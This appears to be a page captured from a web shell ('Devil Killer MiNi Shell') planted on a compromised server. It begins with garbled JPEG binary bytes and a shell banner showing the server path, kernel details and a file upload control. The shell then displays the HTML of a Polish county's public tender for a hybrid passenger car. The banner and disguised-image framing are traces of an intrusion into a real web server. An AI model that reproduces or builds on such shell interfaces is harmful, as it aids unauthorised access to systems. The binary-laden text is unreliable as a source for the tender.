JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250227/0012261201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup samochodu osobowego o napędzie hybrydowym dla Starostwa Powiatowego w Radomiu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Radomski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670223110</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Mazowieckiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@spradom.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.spradom.finn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup samochodu osobowego o napędzie hybrydowym dla Starostwa Powiatowego w Radomiu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-99cb2f33-0c18-475a-800b-271a591b118d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00122612</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00043690/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Zakup samochodu osobowego o napędzie hybrydowym dla Starostwa Powiatowego w Radomiu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiat-radomski.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://powiat-radomski.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Instrukcji korzystania dla Wykonawców. Instrukcja jest udostępniona na platformie Marketplanet OnePlace.<br/>2. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej. <br/>Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia oferty lub wniosku oraz do komunikacji wynosi 100 MB. <br/>4. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na platformę Marketplanet OnePlace.<br/>5. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem platformy Marketplanet OnePlace w zakładce Korespondencja z Wykonawcami.<br/>Szczegółowe zapisy zawarte zostały w SWZ (rozdział XVI)</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://powiat-radomski.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>a)	administratorem Pani/Pana danych osobowych jest Starostwo Powiatowe w Radomiu reprezentowane przez Starostę z siedzibą w Radomiu przy ul. T. Mazowieckiego 7, tel. (48) 36-55-801, adres e-mail: powiat@radompowiat.pl<br/>b)	dane kontaktowe do Inspektora Ochrony Danych: Beata Kiełbania-Kubik - Starostwo Powiatowe w Radomiu, ul. T. Mazowieckiego 7, 26-600 Radom, pok. 124, tel. (48) 36-55-801 wew. 181; (48) 340 40-64 wew. 181, e-mail: bkubik@spradom.eu; <br/>c)	Pani/Pana dane osobowe przetwarzane będą w celu realizacji ustawowych zadań urzędu - na podstawie art. 6 ust. 1 lit. b, c ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016r. oraz na podstawie Art. 9 ust 2 lit a ogólnego rozporządzenia o ochronie danych osobowych z dnia 27 kwietnia 2016r.;<br/>d)	odbiorcami Pani/Pana danych osobowych będą wyłącznie podmioty uprawnione do uzyskania danych osobowych na podstawie przepisów prawa w tym m.in. osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 11września 2019 roku – Prawo zamówień publicznych (t. j. Dz. U. z 2024 r. poz. 1320), dalej „ustawa Pzp”;<br/>e)	Pani/Pana dane osobowe przechowywane będą w czasie określonym przepisami prawa, zgodnie z instrukcją kancelaryjną;<br/>f)	posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo do żądania od administratora dostępu do danych osobowych <br/>- na podstawie art. 16 RODO prawo do ich sprostowania*<br/>- na podstawie art.18 RODO prawo do ograniczenia przetwarzania prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa <br/>w art. 18 ust. 2 RODO **;<br/>g)	ma Pani/Pan prawo wniesienia skargi do organu nadzorczego (tj. Prezesa Urzędu Ochrony Danych Osobowych) przy ul. Stawki 2, 00-193 Warszawa);<br/>h)	nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO,<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/><br/>*: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz <br/>nie może naruszać integralności protokołu oraz jego załączników. <br/>**: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, wcelu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego. Zamawiający dodatkowo informuje, że: Wykonawca ubiegający się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ON.272.38.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zakup i dostawa fabrycznie nowego, nieużywanego samochodu osobowego dla Starostwa Powiatowego w Radomiu.<br/>2.	Zestawienie wymagań minimalnych dotyczące parametrów i wyposażenia z zakresu następujących elementów i podzespołów:<br/>I. DANE OGÓLNE<br/>1.	Rok produkcji: 2024/2025<br/>2.	Umiejscowienie kierownicy: po lewej stronie<br/>II. NADWOZIE<br/>1.	Liczba miejsc: nie mniej niż 5<br/>2.	Typ nadwozia: SEDAN<br/>3.	Liczba drzwi: nie mniej niż 4<br/>III. SILNIK / SKRZYNIA BIEGÓW / BATERIA<br/>1.	Typ: hybrydowy <br/>2.	Pojemność skokowa (cm3 ): nie mniej niż 1998 cm3<br/>3.	Napęd na przednią lub tylną oś<br/>4.	Rodzaj skrzyni biegów: automatyczna<br/>IV. WYMIARY<br/>1.	Długość: nie mniej niż 4850 mm<br/>2.	Szerokość: nie mniej niż 1800 mm<br/>3.	Rozstaw między osiami: nie mniej niż 2800 mm<br/>V. WYPOSAŻENIE<br/>1. Bezpieczeństwo<br/>1.	System zapobiegający blokowaniu się kół podczas hamowania<br/>2.	System stabilizacji toru jazdy<br/>3.	System wspomagający pokonywanie podjazdów<br/>4.	System ostrzegania o ruchu poprzecznym z tyłu pojazdu<br/>5.	System ostrzegania o ruchu poprzecznym z przodu pojazdu<br/>6.	Asystent bezpiecznego wysiadania z pojazdu<br/>7.	Asystent utrzymania pasa ruchu<br/>8.	System monitorowania martwego pola<br/>9.	Asystent unikania kolizji czołowych<br/>10.	Czołowe poduszki powietrzne kierowcy i pasażera<br/>11.	Boczne poduszki powietrzne kierowcy i pasażera<br/>12.	Kurtynowe poduszki powietrzne<br/>13.	Aktywny tempomat<br/>14.	System monitorowania ciśnienia w oponach<br/>15.	Spryskiwacze przednich świateł<br/>16.	Stacja do bezpiecznego ładowania telefonu w konsoli centralnej<br/>17.	Układ rozpoznawania znaków drogowych<br/>18.	Kolanowa poduszka powietrzna kierowcy<br/>19. Hamulce tarczowe<br/>2. Komfort<br/>1.	Wspomaganie układu kierowniczego<br/>2.	Regulacja kolumny kierownicy w dwóch płaszczyznach<br/>3.	Zagłówki przednie z regulacją wysokości<br/>4.	Zagłówki tylne z regulacją wysokości<br/>5.	Podgrzewana kierownica<br/>6.	Podgrzewane fotele przednie<br/>7.	Fotel kierowcy z regulacją wysokości<br/>8.	Fotel pasażera z regulacją wysokości<br/>9.	Fotel kierowcy z regulacją odcinka lędźwiowego<br/>10.	Centralny zamek ze zdalnym sterowaniem<br/>11.	Elektrycznie regulowane szyby boczne przednie i tylne<br/>12.	Elektrycznie regulowane i podgrzewane lusterka boczne<br/>13.	Przyciemniane szyby tylne<br/>14.	Klimatyzacja automatyczna dwustrefowa<br/>15.	Czujnik deszczu<br/>16.	Czujnik zmierzchu<br/>17.	Tylne i przednie czujniki parkowania<br/>18.	Światła do jazdy dziennej wykonane w technologii LED<br/>19.	Światła mijania i drogowe wykonane w technologii LED<br/>20.	Światła pozycyjne wykonane w technologii LED<br/>21.	Światła tylne wykonane w technologii LED<br/>22.	Komputer pokładowy<br/>23.	Gniazdo 12V w konsoli centralnej<br/>24.	2 porty USB-C w konsoli środkowej z przodu oraz 2 dla pasażerów z tyłu<br/>25.	Nawigacja satelitarna<br/>26.	Stacja multimedialna z ekranem o przekątnej nie mniejszej niż 12 cala, <br/> z tunerem radiowym DAB+, łączność Apple Car Play i Android Auto<br/>27.	System Bluetooth z zestawem głośnomówiącym<br/>28.	Cyfrowe zegary z wyświetlaczem minimum 7 cala<br/>29.	Kamera cofania z dynamicznymi liniami ułatwiającymi parkowanie<br/>30.	Podgrzewane lusterka zewnętrzne<br/>31.	Elektryczny hamulec postojowy<br/>32.	Zdalne otwieranie drzwi bagażnika<br/>33.	System bezkluczykowego dostępu do samochodu – tzw. Inteligentny kluczyk<br/>34.	Uruchamianie silnika przyciskiem<br/>35.	Automatyczne ostrzeganie tylnymi światłami awaryjnymi<br/>3. Inne<br/>1.	Gaśnica atestowana<br/>2.	Trójkąt ostrzegawczy<br/>3.	Apteczka<br/>4.	Koło zapasowe pełnowymiarowe<br/>5.	Podnośnik oraz klucz do odkręcania kół<br/>6.	Dywaniki przód i tył<br/>7.	Dywanik bagażnika<br/>4. Nadwozie i podwozie<br/>1.	Felgi ze stopu metali lekkich w rozmiarze min. 18 cali<br/>5. Zabezpieczenia i blokady<br/>1.	Immobiliser<br/>2.	Alarm <br/>VI. KOLOR<br/>1.	Nadwozie: lakier czarny<br/>2.	Lusterka w kolorze nadwozia<br/>3.	Tapicerka materiałowa lub skórzana, kolor: ciemny<br/>VII. Gwarancja<br/>Zgodnie z gwarancją producenta, bez limitu przebiegu kilometrów, licząc od daty podpisania Protokołu Zdawczo-Odbiorczego.<br/>Dokumentacja pojazdu<br/>Wykonawca wraz z samochodem dostarczy Zamawiającemu:<br/>1.	świadectwa zgodności WE albo świadectwa zgodności wraz z oświadczeniem zawierającym dane <br/>i informacje/dokumenty o pojeździe niezbędne do rejestracji i ewidencji pojazdu, <br/>2.	książki serwisowej pojazdu, <br/>3.	instrukcji obsługi pojazdu (w języku polskim), <br/>4.	karty gwarancyjnej pojazdu, <br/>5.	dwóch kompletów kluczyków do pojazdu, <br/>6.	innych dokumentów niezbędnych do rejestracji i ubezpieczenia samochodu.<br/><br/>INFORMACJE DODATKOWE <br/>1.	Samochód osobowy będący przedmiotem dostawy winien być fabrycznie nowy, nieużywany, <br/>nie powystawowy, pełnowartościowy, sprawny technicznie, wolny od wszelkich wad fizycznych <br/>i prawnych, w szczególności nie mogą wobec niego zgłaszać żadnych roszczeń osoby trzecie, pojazd nie może być przedmiotem jakiegokolwiek postępowania i zabezpieczenia oraz ma spełniać wszelkie normy dopuszczające go do ruchu drogowego w Polsce. <br/>2.	Wykonawca oświadcza, że pojazd będący przedmiotem dostawy spełnia wszystkie standardy jakościowe i techniczne wynikające z funkcji i przeznaczenia, posiada wszelkie niezbędne atesty i certyfikaty oraz spełnia właściwe normy. <br/>3.	Najpóźniej w chwili wydania przedmiotu dostawy (samochodu osobowego) Wykonawca zobowiązany jest przekazać Zamawiającemu wszystkie instrukcje obsługi oraz wszelkie inne wymagane dokumenty niezbędne do rejestracji pojazdu oraz jego prawidłowego użytkowania. <br/>4.	Zamawiający zastrzega sobie prawo do przeprowadzenia oględzin dostarczonego przez Wykonawcę pojazdu, a także jego kontrolnego uruchomienia. <br/>5.	Do przedmiotu umowy Wykonawca zobowiązuje się dostarczyć dokumentację techniczną (wraz z instrukcją obsługi w języku polskim) oraz części składowych wchodzących w skład wyposażenia, kartę gwarancyjną w języku polskim itd. <br/>6.	Wykonawca dostarczy Zamawiającemu wraz z przedmiotem zamówienia dokumenty określające zasady świadczenia serwisu gwarancyjnego i pogwarancyjnego oraz wykaz punktów serwisowych na terenie kraju uprawnionych do napraw gwarancyjnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34110000-1 - Samochody osobowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za najkorzystniejszą uznana zostanie ta z ocenianych ofert, która uzyska najwyższą ocenę punktową. <br/>2. Dla zastosowanych kryteriów oceny ofert Zamawiający będzie obliczał wartość punktową oferty (zaokrągloną do dwóch miejsc po przecinku) w oparciu o następujące wzory: <br/>2.1	Cena [C] <br/>Ocena w zakresie kryterium „Cena” będzie dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego wzoru (liczba punktów możliwych do uzyskania – 60). <br/>C = (Cn/Cb) × 60 pkt. <br/>gdzie: C – ilość punktów za kryterium „Cena” <br/>Cn –najniższa cena ofertowa spośród ofert nieodrzuconych Cb – cena badanej oferty <br/>2.2	Termin realizacji [T] <br/>Ocena w zakresie kryterium „Termin realizacji” będzie dokonywana na podstawie podanego w formularzu ofertowym terminu realizacji zamówienia (liczba punktów możliwych do uzyskania – 40). <br/>Ocena przeprowadzona zostanie wg poniższego zestawienia: <br/>-	oferta, w której wskazany przez Wykonawcę termin realizacji zamówienia wyniesie: <br/>15 dni – otrzyma 40 pkt. <br/>30 dni – otrzyma 20 pkt. <br/>45 dni – otrzyma 10 pkt. <br/>46 i więcej dni – otrzyma 0 pkt. <br/>gdzie: T – ilość punktów za kryterium „Termin realizacji” <br/> UWAGA!<br/>Brak wskazania powyższych informacji, będzie skutkowało odrzuceniem oferty jako niezgodnej z warunkami zamówienia. Niezaznaczenie żadnego z wariantów, a także zaznaczenie więcej niż jednego wariantu będzie skutkowało odrzuceniem oferty jako niezgodnej z warunkami zamówienia. <br/>Ocena oferty. <br/>Zamawiający wybierze ofertę, która otrzyma najwyższą liczbę punktów (P), stanowiących sumę punktów przyznanych w ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem: <br/>P = C + T gdzie: P- liczba punktów uzyskanych przez ofertę</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następującego podmiotowego środka dowodowego, w celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu (aktualnego na dzień złożenia) - Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w Rozdziale VIII SWZ, o których mowa w art. 108 ust. 1 ustawy Pzp – Załącznik nr 4 do SWZ. <br/>2. Wykonawca składa podmiotowe środki dowodowe określone w pkt. 1 na wezwanie Zamawiającego. Dokumenty te powinny być aktualne na dzień ich złożenia. <br/>3. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga w niniejszym postępowaniu przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oferta musi zawierać następujące oświadczenia i dokumenty:<br/>1) Formularz ofertowy, stanowiący Załącznik nr 2 do SWZ (przy czym Wykonawca może sporządzić ofertę wg innego wzorca, powinna ona wówczas obejmować dane wymagane dla oferty w SWZ i załącznikach).<br/>2) 